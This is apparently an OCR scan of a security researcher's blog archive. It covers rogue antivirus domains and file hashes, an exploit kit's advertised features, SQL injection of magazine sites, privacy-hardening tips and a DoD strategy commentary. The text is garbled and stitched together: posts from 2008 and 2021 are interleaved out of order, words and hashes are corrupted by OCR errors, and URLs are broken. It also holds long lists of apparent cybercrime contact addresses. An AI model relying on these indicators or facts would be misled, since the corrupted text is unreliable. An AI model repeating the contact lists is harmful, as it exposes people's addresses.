i3wm@exploit.im 
eurdefrance@exploit.im 
don1942@jabb3r.de 
bobclaudel0@xmpp.jp 
zrk@exploit.im 
avalon@zloy.im 
404notfound@jabber.otr.im 
mueasik@omerta.im 
nortobi@prv.st 
jimmytong@exploit.im 
yourside@jabb.im 
manaraga@xabber.org 
finnbreaske@xmpp.jp 
trozik355@exploit.im 
maxmalesya@zloy.im 
dolemite@jabb.im 
15052 


the latest phishing page, and the second one taking advantage of plugins under a .phish file 
extension. " 


Read the entire post - [5]DIY phishing kits introducing new features. 


1. http: //ddanchev. blogspot .com/2008/05/ethical-phishing-to-evaluate-phishing. htm 


2. http: //ddanchev. blogspot .com/2007/08/diy-phishing-kits.htm 
3. http: //ddanchev. blogspot .com/2007/08/diy-phishing-kits_29.htm 


4. http: //ddanchev. blogspot .com/2007/09/diy-phishing-kit-goes-20.htm 


5. http: //blogs.zdnet .com/security/?p=1104 


4.5.15 Got Your XPShield up and Running? (2008-05-15 21:20) 


. XP. 
THE BEST PROTECTION AGAINST 
J mavevees ann Geeerren 
home download buy crim 
“11 the anewer to one of these questions & "Ves", then you are 
probably infected. What © spyware? 


About XP-Sheekd profesuonad 


32 money back quarant 
antharware bt = S — 


o 


Cowrioad 


Do not watt, try now for freet OB 


Don’t. Continuing previous posts with [1]three different portfolios of fake security software, 
and [2]Zlob malware variants posing as video codecs, the rogue security application XP Shield 
is the latest addition to the never ending list, with the following domains participating in the 
campaign : 


xp-shield.com 
1508 


vbv _dude@xmpp.jp 
allcrd@exploit.im 
killoprotection@exploit.im 
gank-ddos@exploit.im 
born@neko.im 
gozoomgo@Onllne.at 
lorribest@exploit.im 
swerst1965@jabbim.com 
irondimon@jabber.ru 
johnagent@exploit.im 
358321790@exploit.im 
united.hacker.09@mail.ru 
megaman@jabber.ru 
megaman2.0@xmpp.jp 
poizn@jabber.ru 
anivia@jabber.ru 
veniseller2@jabb.im 
vze2r8dg@verizon.net 
tacie.clough@att.net 
dependent@exploit.im 
de541020@gmail.com 
fuckingsuck@exploit.im 
megaladon@sj.ms 
mst121@jabber.ru 
madred@exploit.im 
guesswho71@xmpp.jp 
sanche@exploit.im 
troubleonmymind@conversations.im 
timothy _savenko@xmpp.jp 
nik1tanikitin@yandex.ru 
pirojok2016@jabber.ru 
Heroini@mail2tor.com 
lobo@exploit.im 
azrail666@securejabber.me 
Virtuoso643@gmail.com 
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huyase@exploit.im 
025VPvvMxL@protonmail.com 
dev.tenebris@securejabber.me 
profmoriarty@xabber.org 
vbv _dude@exploit.im 
acctnrouting@jabber.ru 
lakitraffik@exploit.im 
exspert.company@gmail.com 
ensi@Onl1ne.cc 
k3rber@exploit.im 
burnash@pandion.im 
imostro@jabb3r.org 
damass3003@xmpp.jp 

bez problem077@xmpp.jp 
sup2crd@jabster.pl 
tungsten@exploit.im 
anzorchampion@exploit.im 
try4amil2@jabberzac.org 
inet2010@njs.netlab.cz 
darent@exploit.im 
maxotti@nora.ws 
donpatron@blabber.im 
curtislowe34@xabber.org 
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Stay tuned! 
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Dear blog readers, 


This is Dancho. After approximately 12 years of operation and 5.6M page views since Decem- 
ber, 2005, I’ve decided to make my personal blog which is one of the security industry’s leading 
publications with thousands of unique visitors on a daily basis since December, 2005 private 
with the idea to attract a high-quality and vetted invite-only audience of up to 100 readers for 
a $100 for one year access to the blog which would greatly allow me to do my research and 
continue producing high-quality and never-published before type of research and cybercrime 
and OSINT including threat intelligence type of analysis and research articles and reports. 


Are you interested in obtaining invite-only access to my personal blog? Can you afford to pay 
$100 for one year access to my personal blog? Keep reading. 
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For the $100 amount I can guarantee daily updates of up to 5 or 6 high-quality blog post articles 
discussing never-published or discussed before type of cybercrime research including hardcore 
technical research and OSINT and threat intelligence type of research and information in the 
following areas and categories: 


Targeted Malware Analysis - An Analysis 
¢ In-the-Wild Malware Analysis - An Analysis 
¢ Targeted Phishing Analysis - An Analysis 


Malicious URL Analysis - An Analysis 


Targeted Mobile Malware Analysis - An Analysis 


¢ APT Coverage - New Campaign 


Fraudulent Infrastructure - An Analysis 


¢ Online Fraud Campaign - An Analysis 


Historical OSINT Campaign - An Analysis 


¢ Russian Business Network coverage 


Koobface Botnet coverage 

* Kneber Botnet coverage 

¢ Hundreds of IOCs (Indicators of Compromise) 

¢ Tactics Techniques and Procedures In-Depth Coverage 

¢ Malicious and fraudulent infrastructure mapped and exposed 
¢ Malicious and fraudulent Blackhat SEO coverage 

¢ Malicious spam and phishing campaigns 

¢ Malicious and fraudulent scareware campaigns 

¢ Malicious and fraudulent money mule recruitment scams 

¢ Malicious and fraudulent reshipping mule recruitment scams 
¢ Web based mass attack compromise fraudulent and malicious campaigns 


¢ Malicious and fraudulent client-side exploits serving campaigns 


Are you interested in continuing to read and go through my research as you were during the 
initial opening of this blog since December, 2005 up to present day? | would need the following 
information in order to grant access to my personal blog with the idea to resume posting high- 
quality and never-published or discussed before type of research and articles as of today. 


¢ An introduction email to my dancho.danchev@hush.com with a brief introduction including 
your name and position and the reason why you’re interested in obtaining access to my 
personal blog for research purposes in an invite-only fashion 
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¢ An upfront payment of $100 to my PayPal ID: dancho.danchev@hush.com which guaran- 
tees one year free access to my personal blog an up to 5 or 6 high-quality and never- 
published before type of research articles on a daily basis 


¢ A follow up email to my dancho.danchev@hush.com to confirm that you’ve send the pay- 
ment and that you’re interested in obtaining access to my personal blog where I'll use 
your email for the purpose of sending you an invitation and offering you access to my 
personal blog 


Let’s make this happen! 


17.3.15 Exposing a Currently Active Stolen Credit Cards E-Shop - An OSINT Analysis 
(2021-03-25 14:07) 


[1] 


I’ve recently came across to a currently active cybercrime-friendly online E-shop for stolen 
credit cards which basically empowers its customers with the necessary information including 
actual stolen and compromised credit cards information for the purpose of allowing them to 
obtain access to such type of information and I’ve decided to offer an exclusive peek inside 
the inner workings of the E-Shop with the idea to assist U.S Law Enforcement and the U.S 
Intelligence Community on its way to track down and prosecute the cybercriminals behind 
these campaigns. 


Sample screenshots of the cybercrime-friendly E-shop offering access to stolen and 
compromised credit cards information: 


[2] 
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xpshield.com 
xpantiviruspro.com 
xpantivirussecurity.com 
xponlinescanner.com 
xpprotectionsoftware.com 
xpantivirussite.com 

antivi 

ruS2008x.com 
securityscannersite.com 
antivirus-xp.awardspace.us 


xpantivirus.awardspace.co.uk 


The detection rates for the time being : 


XPShieldSetup.exe 


Scanners result : 1/32 (3.13 %) 


File size : 517632 bytes 


MDS5 ...: 99c7271lac88edc56e1d89c9f738f889c 


SHA1 ..: 3347564017d289ffd116f70faa712e05883358f4 


XPantivirus2008 _v880381.exe 


Scanners result : 4/32 (12.5 %) 


File size : 65024 bytes 


MD5 ...: ef9024963b1d08653dcc8d8b0d992998 


SHAL ..: 436bf47403e0840d423765cf35cf9dea76d289a5 
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It should be clearly noted that both the public and free instance of Snort offers an in-depth 
network-based and sophisticated current and emerging threats type of protection and that the 
rule set gets properly updated on a daily basis with relevant signatures for a variety of threats 
which should be considered as a must use including Cisco’s proprietary Snort rule set which also 
gets updated on a periodic basis which also includes that use of Cisco’s Threat Grid in terms of 
offering real-time protection against current and emerging threats including the geolocation- 
based firewall which basically allows a user to only allow access to a specific country’s online 
assets and to also deny access to the majority of countries internationally potentially mitigating 
a possible breach and intrusion scenario where an attacker would attempt to phone back and 
actually attempt to access the compromised network which is a where a geolocation based 
firewall comes into play properly protecting a network and its infrastructure from possible leaks 
and malicious software attempting to phone back including possible IP (Intellectual Property) 
leaks which could easily allow a nation-state or a sophisticated online to easily map and attempt 
to build a bigger picture in terms of a company or an end user’s online activity for the purpose 
of establishing the foundation for successful and related type of malicious attack campaigns 
launched against a specific network or an end user. 


Among the basic principles that should drive an individual or an organization that seeks to 
protect itself from modern nation-state or rogue actors type of threats should include the use 
of community driven and basically commercially free services and products which also include 
the use of Snort including the use of Cisco’s global threat intelligence grid for the purpose of 
preventing and responding to modern cyber attack outbreaks including currently active and 
live threats. 


[11] 
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Yet another highly recommended and extremely relevant in terms of proactive and reactive 
protection feature courtesy of Cisco’s Firepower ASA appliance is the Botnet Traffic Filter fea- 
ture which offers an additional set of botnet traffic mitigation features which basically protects 
a compromised network from possible data leaks and possible attempts for the malicious soft- 
ware to actually phone back to a rogue and malicious infrastructure. 


[12] 


Whitfield Diffie 


whitfield@example.com 


32ca59f8 050f1le22 b1lé6f7d41 
b24c5d07 e57e6a01l ed412e39 
18240859 la48cdb7 q@ ) 
OMEMO: 9 seconds ago Verified 


Show Advanced Encryption Settings 


For users interested in protecting their mobile device from possible mass surveillance and 
eavesdropping campaigns there are several scenarios which should be considered such as for 
instance the use of VPN on a mobile device including actual real-time and email communi- 
cation which should be properly encrypted using for instance PGP including modern real-time 
communication protections mechanisms such as for instance the use of XMPP/Jabber’s OMEMO 
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real-time encryption feature including the use of stripped and proprietary mobile devices which 
greatly mitigate the threat posed by modern mobile malware in the context of using a propri- 
etary operating system which often offers an additional layer of security and privacy for the 
user. 


Recommended "stripped" mobile devices to use potentially preventing widespread surveil- 
lance efforts including personal privacy violations: 


¢ [13]"Stripped" mobile device with hardened security and privacy-aware mobile 
OS 


¢ [14]"Stripped" mobile device with hardened security and privacy-aware mobile OS 01 
¢ [15]"Stripped" mobile device with hardened security and privacy-aware mobile OS 02 
¢ [16]"Stripped" mobile device with hardened security and privacy-aware mobile OS 03 
¢ [17]"Stripped" mobile device with hardened security and privacy-aware mobile OS 04 
¢ [18]"Stripped" mobile device with hardened security and privacy-aware mobile OS 05 
¢ [19]"Stripped" mobile device with hardened security and privacy-aware mobile OS 06 
¢ [20]"Stripped" mobile device with hardened security and privacy-aware mobile OS 07 
¢ [21]"Stripped" mobile device with hardened security and privacy-aware mobile OS 08 
¢ [22]"Stripped" mobile device with hardened security and privacy-aware mobile OS 09 


¢ [23]"Stripped" mobile device with hardened security and privacy-aware mobile OS 10 


The next logical step would be to ensure that the metadata on the device in terms of Web 
browsing including possible public and proprietary service use is properly obfuscated. Among 
the primary concerns whenever you choose to obfuscate a particular set of data would be 
possible supply-chain infiltration on behalf of the U.S Intelligence community in particular pur- 
chase orders that would further allow me to collerate and potentially identify a particular end 
user based on the actual supply-chain infiltration. One of the primary concerns in today’s 
modern Internet world largely dominated by wide-spread surveillance courtesy of the U.S In- 
telligence Community including rogue and potentially malicious actors including nation-state 
and cybercriminals is the direct exposing of an individual’s private network including possible 
collerated-based events that could potentially identify and track down a particular individual. 
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In terms of mobile device obfuscation the end user is largely advised to take advantage of per- 
sonal firewall for the purpose of monitoring outgoing and incoming connections on the device 
in particularly blocking all-incoming connections and closely monitoring outgoing connections. 
Furthermore, what an end user can potentially do in terms of hardening their mobile device 
is to ensure that it does not leak back any internal IP addresses including possibly the device 
MAC address potentially exposing the device user’s internal and private network potentially 
falling victim to "[24J]ABSOLINE EPILSON" type of end point and mobile device targeting type 
of attacks and campaigns courtesy of the U.S Intelligence Community including other rogue 
factors including nation-state actors and cybercriminals in general. How you should proceed 
in order to archive this process? Keep reading. 


Next to the general use of "stripped" mobile devices end users should also consider the follow- 
ing highly recommended tactics techniques and procedures for the purpose of protecting their 
IP (Intellectual Property) including their mobile device and end point device’s confidentiality 
availability and integrity: 


¢ WebCRT - Among the most common privacy-exposing scenarios in terms of "[25J]ABSO- 
LINE EPILSON" remains the active utilization of unsecure browsing habits namely a mis- 
configured browser in terms or browser extension including the newly introduced "local IP 
exposing" WebCRT feature found in a variety of browsers. What should end users better 
do to protect their local IP including adding additional privacy and security features to 
their browser? Keep reading. The first thing a user should ensure from a network-based 
perspective is that their browser fingerprint remains as private as possible including the 
inability of the U.S Intelligence Community. 


Personal Host Based Firewall - the first thing to look for in a personal firewall is a bi- 
directional firewall functionality allowing you to block all incoming traffic and successfully 
allowing you to allow all ongoing traffic based on a variety of rules including possible 
white-listing. The next logical step would be to implement basic ARP-spoofing prevention 
solution for the purpose of ensuring that your ISP including VPN provider cannot perform 
basic ARP-spoofing attack campaigns which could compromise the confidentiality of the 
targeted host and expose to it a multitude of network-based attack deception attack cam- 
paigns. 
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[26] 
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¢ HIPS-based firewall - a decent and highly recommended solution to protect end points 
from malicious software including web-based client-side exploits who might attempt to 
drop malicious software on the affected hosts include the use of host-based intrusion 
prevention system which has the potential to stop a wide variety of threats that have the 
potential to expose an end point to a multi-tude of malicious software such as for instance 
the use of [27]Comodo Firewall which is a highly relevant and recommended solution for 
a huge number of end points in terms of offering advanced and sophisticated malware 
protection mechanisms. 


¢ Basic Network Deception - it should be clearly noted that every network is a subject 
to possibly compromise including automated and targeted attacks which could be easily 
prevented and actually allow a network operator or a network user to gather the necessary 
cyber attack information which could easily offer an in-depth peek inside the activities of 
the cyber attacker in particular the type of information that they’re interested in obtaining. 
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Case in point would be the use of a proprietary network-based deception appliance such 
as for instance [28]Thinkst Canary including the use of the [29]Nova Network Deception 
Appliance which empowers a network operator with a sophisticated network deception 
techniques which allows them to trick a cyber attacker into falling victim into a rogue 
network-based assets with the actual network operator in a perfect position to gather 
intelligence on the real intentions of the cyber attacker while properly protecting their 
infrastructure from malicious attackers 


[30] 
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¢ Custom-Based DNS-based DNSSEC-based servers with no logs policy - worry about the 
U.S Intelligence Community and your ISP eavesdropping on your traffic and Web brows- 
ing history potentially launching man-in-the-middle attacks? Consider utilizing basic free 
privacy-conscious DNS service provider with DNSSEC-enabled no-logs policy such as for in- 
stance - [31]DNS Watch - which you can freely use without worry that your Web browsing 
history and DNS request history will be logged and potentially abused. A possible logi- 
cal recommendation in the context of improving an end-point’s in-depth security strategy 
might be the utilization of the so called protective DNS which offers an in-depth protection 
techniques and is often available online for free. Case in point is the use of [32]Cisco’s 
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214,200,140 xp-shield, xp-shield.com 
14,.200.140 
72.9,108,.82 antivi IX, xpantiviruspro,.com 
xpantivir ecurity.com xpantiv 
xponlinescanner.com 
onsoftware.com 


vps014. vserver4free.de 


How would the end user reach these domains from a malicious attacker’s perspective at the first 
place? Once being redirected to them through an already SQL injected or iFrame embedded 
legitimate site, with evidence of the practice seen in the majority of [3]massive iFrame, SEO 
poisoning and SQL injections campaigns from the [4]last couple of months. 


1. http: //ddanchev. blogspot .com/2008/04/localized-fake-security-software.htm 
2. http: //ddanchev. blogspot .com/2008/03/portfolio-of-fake-video-codecs.htm 


. http: //ddanchev. blogspot .com/2008/03/massive-iframe-seo-poisoning-attack. htm 


Umbrella solution which offers an in-depth protection mechanism and is available to end 
users and organizations online for free. 


[33] 
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Windows-based users should definitely consider using and learning how to use the [34]Ad- 
vanced Tor Router application which basically offers a diverse set of unique privacy-enhancing 
and privacy-preserving featuring while utilizing the Tor Network further ensuring and offering 
a free solution for end users interested in preserving their Web browsing activities including 
possible network-wide Tor Network adoption on per OS and on per application-based basis. 
What does this application has to offer in terms of unique privacy-preserving features? Basi- 
cally it offers a variety of unique and never presented or discussed before type of Tor-Network 
and end-point privacy-enhancing or preserving features further ensuring that the end user will 
remain properly protected from sophisticated network-based and client-based type of attack 
campaigns potentially aiming to identify and expose their identity. What’s worth emphasizing 
on in terms of the application is the unique set of privacy-preserving and oriented client-side 
feature in terms of possibly privacy-oriented and secure browsing experience. 


Sample Screenshot of the Privacy-Preserving Browser-Based Advanced Tor Router fea- 
tures: 
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¢ Anti-forensics - it used to be a moment in time when users were primarily concerned with 
their browsing habits and use of online resources which is where specific browsers that 
don’t log anything on the hard drive come into play. A possible solution and recommen- 
dation here include the use of the [36]Sphere anti-forensics browser which doesn’t log 
anything on the hard drive and should be considered as a decent anti-forensics solution 
for anyone who’s interested. 


* VeraCrypt containers - a proper full-disk encryption solution should be taken into consid- 
eration in case the user wants to protect their information and intellectual property from 
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physical type of attacks that also includes the use of Virtual Desktops with built-in secu- 
rity and privacy mechanisms in place such as for instance the use of [37]Comodo Secure 
Desktop 


¢ Application isolation - it should be clearly noted that a modern and in-depth defense strat- 
egy should include the use of application sandboxing solutions which has the potential to 
prevent a huge number of client-side based exploitation attempts including to actually 
protect an end user from a variety of Web based client-side exploits serving threats such 
as for instance the use of [38]Sandboxie which is a free solution that actually works and 
has the potential to prevent a huge number of Web based threats that expose users to a 
variety of threats 


¢ Hardware-Based Isolation - a proper network based strategy should consist of a basic 
hardware-isolation methodology where for instance malicious attackers would have hard 
time trying to penetrate and compromise due an additional level of hardware-isolation 
applied methodologies and techniques 


Whitelisting - although this approach has been widely discussed throughout the years 
it should be clearly noted that modern anti-malware solutions should be also providing 
a possible application whitelisting feature where users should only whitelist a basic ap- 
plication which would allow them to still perform their activities and basically block and 
prevent and execution of related applications 


Sample tips for the purpose of ensuring a proper and secure installation of end-point security 
solutions include: 


* always password-protect your end-point software including possibly ensuring that the end- 
point security software can self-protect from having it shut down 


* always ensure that a manual update is properly taking place compared to automatic up- 
dates which leaves a window of opportunity for a possible network traffic colleration in- 
cluding possibly rogue and bogus update entering your network 


* ensure that you’re not utilizing the cloud-database feature for the purpose of looking 
up your Web browsing history including possible host-based application execution which 
could lead to a possible data and end-point inventory colleration which basically leaves 
you with a properly secured "stripped" security solution that you can use to properly se- 
cure your end-point without the risk of having your Web browsing history exposes includ- 
ing your end-point application inventory which could lead to possible fingerprinting and 
inventory-mapping which could lead to possible targeted attacks 


[39] 
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What would be an appropriate choice for a VPN-provider basically offering the necessary peace 
of mind in terms of network-based connectivity with privacy-enabled solutions in mind in terms 
of possible no-logs policy including related value-added features further enhancing the neces- 
sary privacy-based no-logs policy in today’s modern Internet World with widespread surveil- 
lance and privacy-violations courtesy of the U.S Intelligence Community and various other 
rogue actors including nation-state and cybercriminals in general? Keep reading. 


The next logical step would be to stay away from mainstream mobile devices citing potential 
Security and Privacy in mind including the use of a properly selected VPN service provider for 
the purpose of applying basic traffic obfuscation techniques including end-point network isola- 
tion in this particual context the end user and the organization should definitely look forward 
to implement a possible VPN provider actually "mixing" public legitimate jurisdiction-aware 
infrastructure with privacy-aware public or proprietary network technology - in this particular 
case VPN2Tor type of technology. 


Mainstream VPN provider as an entry point to a proprietary hardened and privacy-features 
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tailored network - such as for instance the Tor network - NordVPN is a highly recommended 
solution against "ABSOLINE EPILSON" type of end-point colleration-based targeting type 
of attacks. What do | have in mind? Basically the off-the-shelf commercial vendor is also 
currently capable of offering VPN2Tor type of access which basically offers a variety of privacy- 
enhancing features which basically can offer stealth and commercially-relevant solution which 
basically combines VPN functionality with access to the Tor Network which basically offers 
a high-degree of security and anonymity which can be used to protect against "ABSOLINE 
EPILSON" type of attacks in terms of traffic and geographical location deniability including 
possibly offering limited data-colleration capabilities on behalf of U.S Intelligence Agencies. 


BHVPTOFIPPIZ 


[40] 


A proprietary off-the-shelf VPN service provider basically taking you a step higher in pre- 
serving your online privacy by introducing and actually providing a unique set of no-logs 
jurisdiction-aware type of encryption-protocols and basic traffic-mixing tactics and strategies - 
[41]Cryptohippie. 


Want to find out more? Are you interested in a possible evaluation of your organiza- 
tion’s Security Project or Security Product in terms of a Security Assessment or a possible 
OPSEC (Operational Security) based Privacy Features Evaluation? Interested in inviting me to 
speak at your event including possible sensitive and classified project involvement? 


Feel free to reach me at dancho.danchev@hush.com 


Stay tuned! 


1, 
2. 

3. 

4 

5. 

6. 


ttps://search.edwardsnowden.com/docs/iPhonetargetanalysisandexploitationwithuniquedeviceidentifiers2015-0 
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9. 
10. 
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17.3.17 Sock Puppetry - Exposing Foreign Influence Operations or the Basics of In- 
formation Warfare Operations - An Analysis (2021-03-27 11:16) 


17.3.18 DoD’s Cyber Strategy for 2018 - An Analysis (2021-03-29 07:52) 


[1] 


The United States’ strategic competitors are conducting cyber-enabled campaigns to erode U.S. 
military advantages, threaten our infrastructure, and reduce our economic prosperity. The 
Department must respond to these activities by exposing, disrupting, and degrading cyber 
activity threatening U.S. interests, strengthening the cybersecurity and resilience of key potential 
targets, and working closely with other departments and agencies, as well as with our allies and 
partners. 


First, we must __ mili ¥ ili j nd win wars in any domain, includin 

cyberspace. This is a foundational requirement for U.S. national security and a key to ensuring 
that we deter aggression, including cyber attacks that constitute a use of force, against the United 
States, our allies, and our partners. The Department must defend its own networks, systems, and 
information from malicious cyber activity and be prepared to defend, when directed, those 
networks and systems operated by non-DoD Defense Critical Infrastructure (DCI)' and Defense 
Industrial Base (DIB)? entities. We will defend forward to halt or degrade cyberspace operations 


targeting the Department, and we will collaborate to strengthen the cybersecurity and resilience 
of DoD, DCI, and DIB networks and systems. 


Second, the Department seeks to preempt, defeat, or deter malicious cyber activity targeting 
U.S. critical infrastructure that could cause a significant cyber incident regardless of whether that 
incident would impact DoD's warfighting readiness or capability. Our primary role in this 
homeland defense mission is to defend forward by leveraging our focus outward to stop threats 
before they reach their targets. The Department also provides public and private sector partners 
with indications and warning (1&W) of malicious cyber activity, in coordination with other Federal 
departments and agencies. 


Third, the Department will work with U.S. allies and partners to strengthen cyber capacity, 


expand combined cyberspace operations, and increase bi-directional information sharing in 
order to advance our mutual interests. 


Going through the latest [2]DoD Cyber Strategy for 2018 it should be clearly noted that 
several key new developments are continuing to take place which are worth discussing in 
the broader context of real-time cyber threat intelligence cyber attack attribution and cyber 
attack prevention mechanism which today are taking place primarily courtesy of the U.S DoD 
the NSA and the U.S Cyber Command. 


In this post I'll discuss a newly emerged trend which is called "forward defense" where U.S based 
cyber warriors will actually bother to proactively respond to and prevent current and emerging 
cyber attacks by scouting foreign networks including foreign influence and information opera- 
tion campaigns that also includes the use of botnets and cyber espionage type of campaigns 
to further protect U.S critical infrastructure from current and emerging cyber threats. 


While the majority of the cyber threat intelligence work in the U.S is done by the commercial 
sector the U.S Cyber Command continues to actively apply basic U.S DoD military methodology 
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including near real-time information sharing initiatives for the purpose of demonstrating the 
key operational capability in the context of targeting the online infrastructure that also includes 
to actively respond to information warfare including foreign influence operations. 


Key summary points to consider: 


¢ Information Warfare is making its way into the White House official Cyberspace strat- 
egy document - I've already discussed this unique trend in a related article which you 
can check out [3]here - which undoubtedly sets a unique precedent where we have the 
White House directly interfering with basic military concepts such as for instance infor- 
mation warfare and information operations that also includes the use of foreign influence 
operations which further empowers the U.S DoD and the NSA with unique capabilities to 
respond to these type of campaigns possibly directly interfering with Russia’s information 
warfare concepts which believe it or not in another world are directly copied from publicly 
accessible U.S DoD and NSA publicly accessible papers throughout the years. In terms 
of information warfare operations that also includes foreign influence operations this is a 
dangerous game to play which may inevitably lead to actually catching some high-profile 
information warfare operations or eventually KGB or Russia’s FSB operators which goes far 
beyond the usual duties of the U.S Cyber Command the U.S DoD and the NSA in general 
which has to do with far more high-profile cyber threats that also includes cyber warfare 
Campaigns and possible direct threats against U.S critical infrastructure 


¢ Foreign influence operations - it still remains unclear as to the extend of this basic miscon- 
ception which basically relies on the use of social media or the so called rogue and bogus 
content farms which are pretty similar to high-profile and relevant cybercrime-friendly 
blackhat SEO (search engine optimization) campaigns in the context of traffic acquisition 
and traffic hijacking which basically has nothing to do with Russia’s active measures in 
Cyberspace which is a dangerous word to play with in particular in the context of having 
the U.S Cyber Command the U.S DoD and the NSA hunt down and track down foreign in- 
fluence operations. It should be also clearly noted that a direct response should be issues 
on a systematic and persistent basis which basically represents the U.S Cyber Command 
and the U.S DoD including the NSA’s basic principles and mode of operation where the vir- 
tual assets of a specific foreign influence operator can either can directly exposed or shut 
down or actually a direct DoS (Denial of Service) launched against them which shouldn’t 
be surprising in the broader context of fighting cybercrime and responding to cyber war- 
fare incidents and campaigns online 


* Sock puppetry and foreign influence operations - yet another dangerous word which 
should be used with caution remains the use of "sock puppets" which are basically for- 
eign influence operators positioned by the U.S Cyber Command the U.S DoD and the NSA 
as a possible National Security risk which should be properly monitored and actions taken 
against it in one form or another in particular a direct attempt to expose the operator 
behind the rogue and bogus content farm including to actually attempt to launch a DoS 
(Denial of Service) attacks against their infrastructure 


Stay tuned! 


1. https://1.bp.blogspot. com/-9CAXoI91gmY/YF74QQDOHNI/AAAAAAAAMAw/Ecd0560ZJf0nzYOkIsR8iz91wRRcdsr jACLcBGASYHQ 
s719/Misc_02.png 
2: ttps://media. defense. gov/2018/Sep/18/2002041658/-1/-1/1/CYBER_STRATEGY_SUMMARY_FINAL. PD 


3. https: //archive.org/details/dancho-danchev-offensive-cyber-warfare-unit-12 
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4.5.16 Redmond Magazine SQL Injected by Chinese Hacktivists (2008-05-17 18:47) 


Redmond | The Independent Voice of the Microsoft IT Community 
This site may harm your computer. 

Redmond magazine - formerly Microsoft Certified Professional Magazine -- The 
Independent Voice of the Microsoft IT Community. It is relied upon by Windows, ... 
redmondmag.com/ - Similar pages - Note this 


REDMOND MAGAZINE Free Subscription Form 


This site may harm your computer. 
Because of your involvement in the Microsoft IT community, you may qualify for a 


complimentary subscription to Redmond magazine. ... 
redmondmag.com/subscribe/ - Similar pages - Note this 
More results from redmondmag.com » 


Microsoft Certified Professional Magazine Online | Managing the ... 

This site may harm your computer. 

Get a Free Subscribtion to Redmond magazine in Print or Digital Format! ... 12th Annual 
Redmond IT Salary Survey Our 12th Annual Salary Survey is now ... 

mcpmag.com/ - Similar pages - Note this 


Microsoft Certified Professional Magazine Online | Salary Survey... 


This site may harm your computer. 
Redmond's 12th Annual IT Salary Survey: Break out the Bubbly Did your IT earnings get 


kicked up a notch this year? Redmond magazine's 2007 IT Salary Survey ... 
mcpmag.com/salarysurveys/ - Similar pages - Note this 
More results from mcpmag.com » 


Redmond Magazine Readers Name VMware Desktop and Server... 

22 May 2006 ... Redmond Magazine Bestows Top Honors on VMware for Third Consecutive 
Year ... In addition, VMware GSX Server received the Redmond Magazine ... 
www.vymware.com/news/releases/redmond_2006 html - 18k - 

Cached - Similar pages - Note this 


Redmond Magazine: Acronis True Image found as Best of the Best... 

Irvine, CA; South San Francisco, CA. February 1, 2005 — Readers of Redmond magazine 
named Acronis True Image preferred product for "Drive Imaging”, ... 
www.acronis.com/pr/2005/pr02-01 html - 17k - Cached - Similar pages - Note this 


Four Redmond related web properties appear to have been [1]SQL injected by Chinese 
hacktivists, namely, Redmond - The Independent Voice of the Microsoft IT Community formerly 
known as Microsoft Certified Professional Magazine , the Redmond Developer News as well as 
the Redmond Channel Partner Online . 


The lone hacktivist also left a message at the malicious domain ( wowyeye.cn ), which 
reads : 


“The invasion can not control bulk!!!!If the wrong target. Please forgive! Sorry if you 
are a hacker. send email to kiss117276@163.com my name is lonely-shadow TALK WITH ME! 
china is great! f**k france! f**k CNN! f**k |! HACKER have matherland! ” 


Go through [2]related posts on the recent [3]Chinese Anti-CNN campaign. 
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[11] 


[12] 
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[13] 


[14] 


[15] 
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[17] 
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HOSTBUEC” 


[18] 
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1. http: //blogs.zdnet .com/security/?p=1118 
2. http: //ddanchev. blogspot .com/2008/04/ddos-attack-against-cnncom.html 
3. http: //ddanchev. blogspot .com/2008/04/chinese-hacktivists-waging-peoples html 


4.5.17 The Small Pack Web Malware Exploitation Kit (2008-05-19 10:08) 


“+ x M!O np mime: =T'v- 


Yet another proprietary web malware exploitation kit has been released at the beginning of 
this month, further indicating that the efficient supply of such kits is proportional to their 
simplistic nature. The only differentiation factor in the Small Pack is perhaps the inclusion of 
all known Opera exploits up to version 9.20, however, the rest of the features are the natural 
ones included in the majority of already known exploitation kits : 


- IE exploits included - Quick Time Modified, PNG, MDAC, DX Media 
- Firefox exploits included - Quick Time, PNG, EMBED 


- Opera - all exploits up to version 9.20 
- RC4 encryption 


- lifetime updates 
- Geolocation 


- opportunity to request additional functions 
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[19] 
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[20] 
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[21] 
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[22] 
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[23] 
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[24] 
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[25] 


[26] 


[27] 
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[28] 
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Converging infection and distribution vectors, evasion and survivability, metrics and command 
and control in a single all-in-one web malware exploitation kits is, however, is definitely in the 
works considering the developments introduced in the rest of the kits currently available. For 
instance, despite that the ongoing waves of SQL injection attacks with multiple campaigns 
are injecting the malicious domains in its original form, certain attacks are starting to inject 
obfuscated URLs making it harder to assess the impact of the campaign using open source 
intelligence techniques. 


The bottom line, as long as webmasters continue participating in the so called "traffic 
exchange" revenue models, knowingly or unknowingly embedding links that would later on 
ultimately redirect to a malicious site, "traffic exchange" is receiving the most attention at the 
strategic level, next to "traffic acquisition" at the tactical level. Basically, the traffic inventory 
that could be supplied is the direct result of an ongoing SQL injection attack, or malware 
embedded through other means, with the traffic brokers directly undermining webmaster’s 
unethical inclusion of exploits within their domains portfolio. 


One thing’s for sure - web malware exploitation kits are not just getting localized, they’re also 
being cloned. 


Related posts: 


[1]The FirePack Exploitation Kit Localized to Chinese 


[2]MPack and IcePack Localized to Chinese 


[3]The FirePack Exploitation Kit - Part Two 

[4]The FirePack Web Malware Exploitation Kit 

[5]The WebAttacker in Action 

[6]Nuclear Malware Kit 

[7]The Random JS Malware Exploitation Kit 

[8]Metaphisher Malware Kit Spotted in the Wild 

[9]The Black Sun Bot 

[10]The Cyber Bot 

[11]Google Hacking for MPacks, Zunkers and WebAttackers 
[12]The IcePack Malware Kit in Action 


1. http: //ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 


ttp://ddanchev.blogspot.com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


ttp://ddanchev.blogspot.com/2008/04/firepack-exploitation-kit-part-two.htm 
ttp://ddanchev. blogspot .com/2008/02/firepack-web-malware-exploitation-kit.html 


3 

4. 

5. netp: / /ddanchev. blogspot. con/2007/05/uebattacker~in-action htm 
6. http: //ddanchev. blogspot . com/2007/08/nuclear-malware-kit . html 
7. 
8 
9 


ttp://ddanchev. blogspot .com/2008/01/random- js-malware-exploitation-kit.htm 
ttp://ddanchev.blogspot.com/2007/11/metaphisher-malware-kit-spotted-in-wild.htm 
ttp://ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 
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[34] 
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[35] 
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[36] 
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[37] 
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[38] 
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[40] 
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[41] 
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4.5.18 Fast-Fluxing SQL Injection Attacks (2008-05-19 14:06) 
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The botnet masters behind Asprox are converging tactics already, [1]by fast-fluxing the SQL 
